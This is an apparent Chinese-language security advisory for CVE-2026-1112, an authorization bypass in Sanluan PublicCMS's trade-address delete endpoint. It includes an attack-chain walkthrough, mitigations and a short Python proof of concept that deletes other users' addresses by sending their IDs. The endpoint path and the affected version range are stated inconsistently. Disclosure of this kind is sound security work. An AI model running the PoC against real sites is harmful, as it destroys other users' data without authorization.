CVE-2026-1112 Sanluan PublicCMS 贸易地址删除接口权限绕过漏洞

漏洞信息

漏洞编号

CVE-2026-1112

漏洞类型

不正确的授权（Improper Authorization）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Sanluan PublicCMS

漏洞概述

CVE-2026-1112是Sanluan PublicCMS中存在的一个中等严重性安全漏洞。该漏洞位于贸易地址删除功能端点（Trade Address Deletion Endpoint），影响publiccms-trade/src/main/java/com/publiccms/controller/web/trade/TradeAddressController.java文件中的delete方法。攻击者可以通过操纵ids参数来绕过授权检查，在未经适当授权的情况下删除其他用户的贸易地址信息。由于该漏洞可被远程利用，且不需要高权限即可发起攻击，因此对系统的机密性和完整性造成一定风险。漏洞利用代码已被公开披露，攻击者可能利用此漏洞对目标系统进行未授权的数据删除操作。该漏洞的CVSS评分为5.4，属于中等严重性级别。

技术细节

该漏洞源于TradeAddressController.java中的delete方法对用户输入的ids参数缺乏有效的授权验证。攻击者可以通过构造恶意的HTTP请求，操控ids参数来指定要删除的其他用户贸易地址记录。由于服务端未正确验证当前认证用户是否具有删除指定地址的权限，导致任何已认证的低权限用户都可以删除系统中任意用户的贸易地址信息。攻击者需要向/api/trade/address/delete或类似端点发送POST请求，在请求体中包含目标地址的ID列表。由于该漏洞影响组件的授权机制，属于OWASP Top 10中的Broken Access Control类别，攻击者无需特殊的权限提升即可利用此漏洞。

攻击链分析

STEP 1

步骤1

攻击者首先注册并登录Sanluan PublicCMS系统，获取有效的用户会话

STEP 2

步骤2

攻击者通过信息收集获取目标用户的贸易地址ID（如通过API枚举或社会工程学手段）

STEP 3

步骤3

攻击者构造恶意HTTP POST请求，向/trade/address/delete端点发送包含目标地址ID的ids参数

STEP 4

步骤4

服务端由于缺少正确的授权验证，执行delete方法删除指定地址

STEP 5

步骤5

目标用户的贸易地址被未授权删除，导致数据完整性丧失

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2026-1112 PoC - Sanluan PublicCMS Trade Address Deletion Authorization Bypass
# Target: Sanluan PublicCMS up to version 5.202506.d
# Vulnerability: Improper Authorization in TradeAddressController delete method

TARGET_URL = "http://target.com"  # Replace with target URL
LOGIN_URL = f"{TARGET_URL}/login"
DELETE_URL = f"{TARGET_URL}/trade/address/delete"

# Step 1: Login to obtain session
login_data = {
    "username": "attacker",
    "password": "password123"
}

session = requests.Session()
response = session.post(LOGIN_URL, json=login_data)

if response.status_code == 200:
    print("[+] Login successful, obtained valid session")
    
    # Step 2: Exploit - Delete victim address by manipulating ids parameter
    # Replace TARGET_ADDRESS_ID with the address ID you want to delete
    exploit_data = {
        "ids": [TARGET_ADDRESS_ID]  # Victim's address ID to delete
    }
    
    exploit_response = session.post(DELETE_URL, json=exploit_data)
    
    if exploit_response.status_code == 200:
        print("[+] Authorization bypass successful - Address deleted")
        print(f"[*] Deleted address ID: {TARGET_ADDRESS_ID}")
    else:
        print(f"[-] Exploit failed with status: {exploit_response.status_code}")
else:
    print("[-] Login failed")

影响范围

Sanluan PublicCMS < 5.202506.d

防御指南

临时缓解措施

在官方补丁发布之前，可通过以下措施临时缓解：1) 禁用或限制trade地址删除API的访问；2) 在Web应用防火墙（WAF）上添加规则监控异常的地址删除请求模式；3) 启用详细的审计日志记录所有地址删除操作以便及时发现异常行为；4) 对低权限用户实施额外的操作限制。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1112
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1112
3 Details https://www.cvedetails.com/cve/CVE-2026-1112/
4 VulDB https://vuldb.com/cve/CVE-2026-1112
5 Link https://github.com/AnalogyC0de/public_exp/issues/4
6 Link https://vuldb.com/?ctiid.341704
7 Link https://vuldb.com/?id.341704
8 Link https://vuldb.com/?submit.732771
9 Link https://github.com/AnalogyC0de/public_exp/issues/4